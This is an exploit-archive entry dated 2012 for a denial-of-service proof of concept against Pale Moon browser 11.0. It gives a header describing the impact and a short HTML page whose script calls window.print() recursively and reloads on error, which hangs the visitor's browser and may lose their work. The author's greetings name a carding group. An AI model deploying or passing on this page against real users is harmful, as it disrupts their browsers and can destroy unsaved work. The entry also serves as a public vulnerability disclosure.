Pale Moon Web Browser v11.0 (Multi Looping) DOS

2012-03-25T00:00:00
ID 1337DAY-ID-17825
Type zdt
Reporter eidelweiss
Modified 2012-03-25T00:00:00

Description

Exploit for windows platform in category dos / poc

                                        
                                            <!--
#Title: Pale Moon Web Browser v11.0 (Multi Looping) DOS exploit
#version: 11.0
#vendor: Moonchild Productions
#download application: http://www.palemoon.org/
#Author: eidelweiss (twitter @RandyArios)
#Contact: admin[at]eidelweiss[dot]info / ariosrandy[at]gmail[dot]com
#Homepage: www.eidelweiss.info
#Tested On: Windows 7 (x86) 
#thank`s and Greetz to : devilzc0de, yogyacarderlink, and all hacker`s
#Impact
Browser doesn't respond any longer to any user input, all tabs are no
longer accessible, your work if any   might be lost.
#Vulnerability Description
This bug is a typical result of multiple  loop. 
The flaw exists when the attacker put window.printer() funtion
in multiple loop.User interaction is required to
exploit this vulnerability in that the target must visit a malicious
web page.
-->
<html>
<title>Pale Moon Multi Looping By eidelweiss</title>
 
<script>
 
 
function
eidelweiss()
{
window.onerror=new Function("history.go(0)");
window.print();
eidelweiss();
 
 
}
eidelweiss();
</script>
 
</html>



#  0day.today [2018-01-02]  #